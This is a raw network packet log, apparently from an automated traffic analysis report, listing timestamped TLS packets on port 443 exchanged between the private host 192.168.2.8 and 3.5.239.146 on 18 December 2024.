                                                                                                                                                                          Dec 18, 2024 13:06:02.948052883 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.948616982 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962811947 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962841988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962903976 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.962913036 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962960958 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.968693972 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968718052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968771935 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968827963 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.968836069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968910933 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.099842072 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099874020 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099942923 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099952936 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.099978924 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099994898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.105771065 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105798960 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105859041 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.105868101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105892897 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111628056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111670017 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111707926 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111715078 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111727953 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111741066 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111764908 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.120121002 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120140076 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120170116 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120207071 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.120217085 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120245934 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.136905909 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.136929989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.137000084 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.137016058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.137032986 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.152060032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152096987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152124882 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152143002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.152151108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152198076 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.157989025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158005953 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158031940 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158045053 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.158050060 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158091068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.289115906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.289144039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.289180994 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.289199114 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.289227009 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.289247036 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.290390015 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.295893908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.295911074 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.295964956 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.295974970 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.296014071 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.302710056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.302736998 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.302768946 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.302774906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.302829027 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.302835941 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.302874088 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.307303905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.307327032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.307368994 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.307375908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.307404995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.307420015 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.310456038 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.330725908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.330745935 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.330784082 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.330792904 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.330811977 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.336153030 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.336193085 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.336216927 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.336225986 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.336251020 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.336271048 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.347697020 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.347717047 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.347748041 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.347750902 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.347757101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.347791910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.353543043 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.353559971 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.353595018 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.353601933 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.353632927 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.408024073 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.408042908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.454884052 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.484951973 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.484966993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.484994888 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.485027075 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.485029936 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.485039949 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.485052109 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.485064030 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.485085011 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.490894079 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.490919113 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.490962029 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.490973949 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.490998983 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.496836901 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.496865034 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.496948004 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.496948004 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.496958017 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.504858971 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.504880905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.504915953 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.504919052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.504930019 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.504955053 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.504981995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.524974108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.525002956 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.525038958 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.525054932 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.525084019 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.525099039 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.525593042 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.536814928 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.536837101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.536884069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.536892891 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.536927938 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.542721033 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.542759895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.542834997 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.542835951 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.542879105 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.542898893 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.542922974 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.674005032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.674029112 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.674119949 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.674156904 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.674201965 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.674634933 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.679780006 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.679802895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.679862976 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.679883957 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.679910898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.686666965 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.686706066 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.686759949 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.686785936 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.686819077 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.686837912 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.692388058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.692404985 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.692487955 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.692527056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.692584991 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.694871902 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.714739084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.714756966 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.714874029 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.714904070 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.720335960 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.720360994 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.720448017 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.720477104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.731707096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.731740952 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.731833935 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.731853962 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.731883049 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.731909037 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.737817049 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.737832069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.737855911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.737906933 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.737931967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.737951994 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.783052921 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.869769096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.869824886 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.869862080 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.869895935 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.869908094 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.872643948 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.872652054 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.875533104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.875582933 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.875600100 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.875608921 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.875642061 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.881546974 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.881592989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.881639957 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.881663084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.881690979 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.889215946 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889271021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889333010 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.889360905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889385939 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.909234047 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909279108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909312010 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.909332037 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909362078 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.921156883 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921216011 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921261072 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.921288967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921314001 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.926594019 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926642895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926688910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.926712036 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926739931 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.970561028 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.970582962 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.017489910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058453083 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058468103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058507919 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058520079 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058640003 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058679104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058746099 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058746099 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.059096098 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064394951 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064414978 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064444065 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064456940 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.064502001 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064538002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.070468903 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070506096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070586920 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.070619106 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070636988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.077025890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077060938 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077100039 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.077127934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077146053 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099152088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099193096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099220037 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099229097 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099246025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099256992 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099287033 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104516983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104536057 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104582071 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104595900 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104604959 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104608059 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104643106 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.116106987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116126060 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116172075 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.116204977 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116219997 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.122001886 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122051954 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122073889 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.122103930 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122123003 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.173872948 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.173906088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.220664978 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.253993988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254007101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254035950 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254050970 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254096031 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254132032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.254174948 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254193068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.259738922 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259777069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259808064 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259857893 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.259906054 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259927034 CET49709443192.168.2.83.5.239.146
